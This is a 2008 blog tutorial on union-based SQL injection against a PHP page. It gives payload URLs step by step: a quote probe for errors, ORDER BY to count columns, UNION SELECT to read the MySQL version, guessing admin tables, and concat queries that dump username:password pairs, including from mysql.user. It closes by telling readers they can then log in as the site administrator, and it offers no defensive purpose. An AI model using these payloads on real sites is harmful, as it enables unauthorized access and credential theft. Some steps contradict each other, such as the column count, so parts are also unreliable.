xprog’s SQL INJECTION TUTORIAL »

Classic SQL Injection Tutorial

————————————————
Classic SQL Injection Tutorial

————————————————

First of all check for vulnerability.

http://www.example.com/news.php?id=1

Now to test it if is vulnerable we add to the end of url ‘ (quote), and that would be http://example.com/news.php?id=1′

So if we get error in that page like this :
“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc…”
or something similar

That means because is vulnerable to sql injection

Now we need to find the number of columns

To find number of columns we use statement order by (tells database how to order the result)

Well lets just incrementing the number until we get an error.

http://www.example.com/news.php?id=1 order by 1/* <– no error

http://www.example.com/news.php?id=1 order by 2/* <– no error this Unknown column ‘3′ in ‘order clause’ or something like that)

http://www.example.com/news.php?id=1 order by 3/* <– error (we get message like this Unknown column ‘3′ in ‘order clause’ or something like that)

That means because the it has a 3 columns , because we got an error on 4.

Now lets check the union function

What we can do with Union?
With union we can select more dada in one sql statement.

So lets start ;)

http://www.example.com/news.php?id=1 union all select 1,2,3/* (we already found that number of columns)

So if , you see some numbers on the screen example 1 or 2 or 3 or 4 etc.. then congratz coz the Union Works ;)

Now we need to check for the Mysql Version
Lets do it fast baby

http://www.example.com/news.php?id=1 union all select 1,2,3/* NOTE: if /* that doesnt work or you get some error, then try with –

it’s important for our query to work properly.

People lets say because that we have number 3 on the screen , now we need to check for the MySql Version.
Lets do it.

Now we need to replace the number of 3 with @@version or version() and to get someting like 4.1.33-log or 5.0.45 or similar.

so it should look like this http://www.example.com/news.php?id=1 union all select 1,@@version,3/*

So , if you get a error like this “union + illegal mix of collations (IMPLICIT + COERCIBLE) …”

Then we need to convert () function

okey lets try

http://www.example.com/news.php?id=1 union all select 1,convert(@@version using latin1),3/*

Or lets try with Hex () and Unhex ()

http://www.example.com/news.php?id=1 union all select 1,unhex(hex(@@version)),3/*

and then people , we will get the MySQL Verzion yaaa ..

Now we need to get the table and the column name.

So if the MySQL Version isĀ  example: ( 4.1.33, 4.1.12…)

We must guess the table and column name in the most cases.

Common table names are: user/s, admin/s , member/s …….

Common Column Names are : username , user , usr , user_name , password , pass , passwd , pwd etc ///

Would be like this :

http://www.example.com/news.php?id=1 news.php?id=1 union all select 1,2,3 from admin/* (if we see number 3 on the screen like before, thats very good.

So we know that table admin exists ..

SO now we need to check column names , lets do it.

http://www.example.com/news.php?id=1 union all select 1,username,3 from admin/* (if you get a error, then you need to try the other column name)

We will get username displayed on screen, example would be admin , or other etc..

Now we need to check if column password exists.

http://www.example.com/news.php?id=1 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)

Now , We seen the password on the screen in the hash or plain-text, its depends of how the database is set up xD

The hash should be md5 hash , mysql hash , etc…

Now people , we must do it .. to complete query to look very good.

To do that , we can use concat () function (it joins strings)

Example:

http://www.example.com/news.php?id=1 union all select 1,concat (username,0×3a,password),3 from admin/*

/* Note : That 0×3a , its a hex value for: [so 0x3a is a hex value for colon]

We have and another way for doing that , example: char(58), ascii value for.

http://www.example.com/news.php?id=1 union all select 1,concat(username,char(58),password),3 from admin/*

Now we will get displayed username:password on screen example : admin:hash or admin:password

When u will hav e this , you can login like Website admin or website Super Administrator.

If you can’t guess the table name right , alwas you can try mysql.user (default)

It has user and password columns , so example would be like this :

http://www.example.com/news.php?id=1 union all select 1,concat(user,0×3a,password),3 from mysql.user/*

The End.

This entry was posted on June 25, 2008 at 10:00 am and is filed under tuToRIaL . You can follow any responses to this entry through the RSS 2.0 feed You can leave a response, or trackback from your own site.

Leave a Reply